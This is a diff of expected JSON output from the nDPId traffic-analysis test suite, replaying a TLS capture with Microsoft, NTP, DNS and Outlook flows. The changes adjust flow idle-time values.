+00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":288,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168080539,"flow_last_seen":1626168080539,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1626168080539,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53918,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":288,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1626168080539,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1626168080539,"pkt":"WNVuaKQA8BiYFWV8CABFAABAAABAAEAGRffAqAF5KHEKL9KeAbvRcN5sAAAAALAC\/\/97\/QAAAgQFtAEDAwYBAQgKPdIENAAAAAAEAgAA"} +00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":289,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168080569,"flow_last_seen":1626168080569,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1626168080569,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53919,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":289,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1626168080569,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1626168080569,"pkt":"WNVuaKQA8BiYFWV8CABFAABAAABAAEAGRffAqAF5KHEKL9KfAbtYRRqJAAAAALAC\/\/+47QAAAgQFtAEDAwYBAQgKPdIEUgAAAAAEAgAA"} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":290,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1626168080587,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1626168080587,"pkt":"8BiYFWV8WNVuaKQACABFAAA0frdAAG0GmksocQovwKgBeQG70p4gI5AJ0XDebYAS\/\/9F7gAAAgQFoAEDAwgBAQQC"} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":291,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":3,"flow_last_seen":1626168080587,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1626168080587,"pkt":"WNVuaKQA8BiYFWV8CABFAAAoAABAAEAGRg\/AqAF5KHEKL9KeAbvRcN5tICOQClAQEAB2rQAA"} 
+00932{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":292,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168080539,"flow_last_seen":1626168080587,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1626168080587,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53918,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":293,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1626168080617,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1626168080617,"pkt":"8BiYFWV8WNVuaKQACABFAAA0hXNAAG0Gk48ocQovwKgBeQG70p8W6XtBWEUaioAS\/\/+g\/gAAAgQFoAEDAwgBAQQC"} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":294,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":1626168080617,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1626168080617,"pkt":"WNVuaKQA8BiYFWV8CABFAAAoAABAAEAGRg\/AqAF5KHEKL9KfAbtYRRqKFul7QlAQEADRvQAA"} 
+00932{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":295,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168080569,"flow_last_seen":1626168080617,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1626168080617,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53919,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01414{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":298,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1626168080539,"flow_last_seen":1626168080639,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":625,"midstream":0,"thread_ts_msec":1626168080639,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53918,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","server_names":"wdcp.microsoft.com,spynet2.microsoft.com,wdcpalt.microsoft.com,spynetalt.microsoft.com,*.cp.wd.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"17e97216fa7f4ec8c43090c6eed97c25","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, 
ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Secure Server CA 2011","subjectDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft Corporation, CN=wdcp.microsoft.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"81:41:67:66:7E:A9:1B:AA:61:3D:DE:D1:41:E7:17:13:CE:C4:3B:22"}} +01414{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":304,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1626168080569,"flow_last_seen":1626168080666,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":625,"midstream":0,"thread_ts_msec":1626168080666,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53919,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","server_names":"wdcp.microsoft.com,spynet2.microsoft.com,wdcpalt.microsoft.com,spynetalt.microsoft.com,*.cp.wd.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"17e97216fa7f4ec8c43090c6eed97c25","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Secure Server CA 2011","subjectDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft Corporation, CN=wdcp.microsoft.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"81:41:67:66:7E:A9:1B:AA:61:3D:DE:D1:41:E7:17:13:CE:C4:3B:22"}} 
00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":310,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168080732,"flow_last_seen":1626168080732,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1626168080732,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"17.253.54.251","src_port":56865,"dst_port":123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00515{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":310,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1626168080732,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1626168080732,"pkt":"WNVuaKQA8BiYFWV8CABFAABMaD0AAEARB0vAqAF5Ef02+94hAHsAOPLHIwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} 00694{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":310,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168080732,"flow_last_seen":1626168080732,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1626168080732,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"17.253.54.251","src_port":56865,"dst_port":123,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"},"ntp": {"request_code":0,"version":0}} 
00516{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":311,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":1626168080762,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1626168080762,"pkt":"8BiYFWV8WNVuaKQACABFAABMWKVAADcR3+IR\/Tb7wKgBeQB73iEAOEmOJAED6wAAAAAAAAAOU0hNAOSX2YmMm6TtAAAAAAAAAADkl9mQ0KMdvOSX2ZDQo9j2"} -00601{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":312,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168081935,"flow_last_seen":1626168081935,"flow_idle_time":7440000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":1,"thread_ts_msec":1626168081935,"l3_proto":"ip4","src_ip":"130.211.33.145","dst_ip":"192.168.1.121","src_port":443,"dst_port":53432,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00529{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":312,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1626168081935,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":97,"pkt_l4_len":63,"thread_ts_msec":1626168081935,"pkt":"8BiYFWV8WNVuaKQACABFAgBT\/jUAADoGG+iC0yGRwKgBeQG70LhXNR5OnF8A9oAYAQrx0QAAAQEICrTFhOw90eMiFwMDABoAAAAAAAAALjbyzjKtkrWGo0S+7wFfhufrwQ=="} 
-00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":313,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1626168081936,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1626168081936,"pkt":"WNVuaKQA8BiYFWV8CABFAAA0AABAAEAG1D7AqAF5gtMhkdC4AbucXwD2VzUebYAQCAChqQAAAQEICj3SCZ60xYTs"} -00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":314,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":3,"flow_last_seen":1626168081936,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":101,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":101,"pkt_l4_len":67,"thread_ts_msec":1626168081936,"pkt":"WNVuaKQA8BiYFWV8CABFAgBXAABAAEAG1BnAqAF5gtMhkdC4AbucXwD2VzUebYAYCABxCwAAAQEICj3SCZ60xYTsFwMDAB6jdVHReZkUes0n0uJUluEta6fWXjhtBJq5oBbOx1I="} +00601{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":312,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168081935,"flow_last_seen":1626168081935,"flow_idle_time":7560000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":1,"thread_ts_msec":1626168081935,"l3_proto":"ip4","src_ip":"130.211.33.145","dst_ip":"192.168.1.121","src_port":443,"dst_port":53432,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00529{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":312,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1626168081935,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":97,"pkt_l4_len":63,"thread_ts_msec":1626168081935,"pkt":"8BiYFWV8WNVuaKQACABFAgBT\/jUAADoGG+iC0yGRwKgBeQG70LhXNR5OnF8A9oAYAQrx0QAAAQEICrTFhOw90eMiFwMDABoAAAAAAAAALjbyzjKtkrWGo0S+7wFfhufrwQ=="} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":313,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1626168081936,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1626168081936,"pkt":"WNVuaKQA8BiYFWV8CABFAAA0AABAAEAG1D7AqAF5gtMhkdC4AbucXwD2VzUebYAQCAChqQAAAQEICj3SCZ60xYTs"} +00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":314,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":3,"flow_last_seen":1626168081936,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":101,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":101,"pkt_l4_len":67,"thread_ts_msec":1626168081936,"pkt":"WNVuaKQA8BiYFWV8CABFAgBXAABAAEAG1BnAqAF5gtMhkdC4AbucXwD2VzUebYAYCABxCwAAAQEICj3SCZ60xYTsFwMDAB6jdVHReZkUes0n0uJUluEta6fWXjhtBJq5oBbOx1I="} 
00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1626168077441,"flow_last_seen":1626168077507,"flow_idle_time":180000,"flow_min_l4_payload_len":73,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":222,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":65492,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Azure","breed":"Acceptable","category":"Cloud"}} 00654{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1626168076607,"flow_last_seen":1626168076607,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.139","dst_ip":"224.0.0.251","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 00652{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1626168076607,"flow_last_seen":1626168076607,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.139","dst_ip":"224.0.0.2","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} -00836{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1626168077620,"flow_last_seen":1626168077673,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1436,"flow_tot_l4_payload_len":2155,"flow_avg_l4_payload_len":195,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"2.22.33.235","src_port":53912,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"4": {"risk":"Binary Application Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"HTTP.Microsoft","breed":"Safe","category":"Download"}} -00836{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1626168077660,"flow_last_seen":1626168077704,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1436,"flow_tot_l4_payload_len":2392,"flow_avg_l4_payload_len":217,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"2.22.33.235","src_port":53913,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"4": {"risk":"Binary Application Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"HTTP.Microsoft","breed":"Safe","category":"Download"}} 
+00836{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1626168077620,"flow_last_seen":1626168077673,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1436,"flow_tot_l4_payload_len":2155,"flow_avg_l4_payload_len":195,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"2.22.33.235","src_port":53912,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"4": {"risk":"Binary Application Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"HTTP.Microsoft","breed":"Safe","category":"Download"}} +00836{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1626168077660,"flow_last_seen":1626168077704,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1436,"flow_tot_l4_payload_len":2392,"flow_avg_l4_payload_len":217,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"2.22.33.235","src_port":53913,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"4": {"risk":"Binary Application Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"HTTP.Microsoft","breed":"Safe","category":"Download"}} 
00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1626168077590,"flow_last_seen":1626168077604,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":282,"flow_avg_l4_payload_len":141,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":51364,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"}} 00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1626168077413,"flow_last_seen":1626168077486,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":244,"flow_avg_l4_payload_len":122,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":55567,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"}} 
00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1626168077604,"flow_last_seen":1626168077619,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":108,"flow_tot_l4_payload_len":152,"flow_avg_l4_payload_len":76,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":55578,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}} 
@@ -193,27 +193,27 @@ 00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1626168080732,"flow_last_seen":1626168080762,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"17.253.54.251","src_port":56865,"dst_port":123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"}} 00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1626168080092,"flow_last_seen":1626168080122,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"17.253.54.251","src_port":65099,"dst_port":123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"}} 
00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1626168075664,"flow_last_seen":1626168076674,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":1180,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":52251,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}} -00716{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":72,"flow_first_seen":1626168078673,"flow_last_seen":1626168079052,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":29308,"flow_avg_l4_payload_len":407,"midstream":1,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"52.98.163.18","src_port":53428,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Outlook","breed":"Acceptable","category":"Email"}} 
-00716{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":54,"flow_first_seen":1626168078673,"flow_last_seen":1626168078826,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":17628,"flow_avg_l4_payload_len":326,"midstream":1,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"52.98.163.18","src_port":53429,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Outlook","breed":"Acceptable","category":"Email"}} 